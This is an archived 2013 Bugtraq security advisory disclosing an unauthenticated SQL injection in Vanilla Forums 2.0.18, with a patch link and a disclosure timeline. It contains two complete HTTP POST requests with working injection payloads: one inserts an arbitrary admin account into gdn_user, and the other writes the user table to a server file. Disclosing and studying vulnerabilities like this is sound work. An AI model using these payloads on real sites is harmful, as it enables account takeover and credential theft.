| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <774ba10a193887fc7a7c90be3f5d0b2b@service.innter.net> Date: Fri, 05 Apr 2013 19:55:30 +0200 From: mschratt@...-enterprise.com To: <bugtraq@...urityfocus.com> Subject: Vanilla Forums 2.0.18 / SQL-Injection / Insert arbitrary user & dump usertable Product Name: Vanilla Forums Vulnerable Version: Up to vanilla-core-2-0-18-4 Tested on: Windows Server 2003 Apache 2.4.3 PHP 5.4.7 MySQL 5.5.27 Vulnerability Overview: SQL-Injection is possible, because$_POST arrays are not proper sanitized. You do not need to be authenticated. Vulnerability Details: To insert an arbitrary user, a sample HTTP-Post Request looks as follows: POST /[PATH]/vanilla/entry/signin HTTP/1.1 Host: [HOST] User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: [any cookie] Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 399 Form%2FTransientKey=VQYSOG2F3D38&Form%2Fhpt=&Form%2FTarget=discussions& Form%2FClientHour=2013-3-28+11%3A37&Form%2FEmail['admin';INSERT INTO gdn_user (UserID, Name, Password, HashMethod, DateInserted, Admin, Permissions) VALUES (NULL, '1234', '$P$BayO4QrMb9wgzdjNhlUBWdQcVaMnKN0', 'Vanilla', '2013-03-28 00:00:00', '1', '');#]=abcd&Form%2FPassword=*&Form%2FSign_In= Sign+In&Checkboxes%5B%5D=RememberMe Indeed you has to take care of the proper encryption algorithm which is currently used. As it is not possible to get the user table displayed on the website, you could establish an attack as follows: POST /[PATH]/vanilla/entry/passwordrequest HTTP/1.1 Host: [HOST] User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 255 Form%2FTransientKey=OJS6EB1J0KW7&Form%2Fhpt=&Form%2FEmail['ac';select * from gdn_user into outfile '[FULL_PATH]\\vanilla\\out.txt' #]=13& Form%2FRequest_a_new_password=Request+a+new+password Update Link: http://vanillaforums.org/discussion/23339/security-update-vanilla-2-0-18-7 Credits: This vulnerability was discovered by Michael Schratt Mail: mail @ mfs-enterprise . com Web: http://mfs-enterprise.com/wordpress/2013/04/05/vanilla-forums-2-0-18-sql-injection-insert-arbitrary-user-dump-usertable/ Twitter: @bl4ckw0rm Timeline: Mar 28, 2013 – Discovered vulnerability Mar 28, 2013 – Contacted vanilla forums and asked for security contact Mar 28, 2013 – Vanilla Forums responded Mar 28, 2013 – Transfered vulnerability details Apr 02, 2013 – Requested update Apr 04, 2013 – Requested update Apr 05, 2013 – Patch released Apr 05, 2013 – Public advisory released
Powered by blists - more mailing lists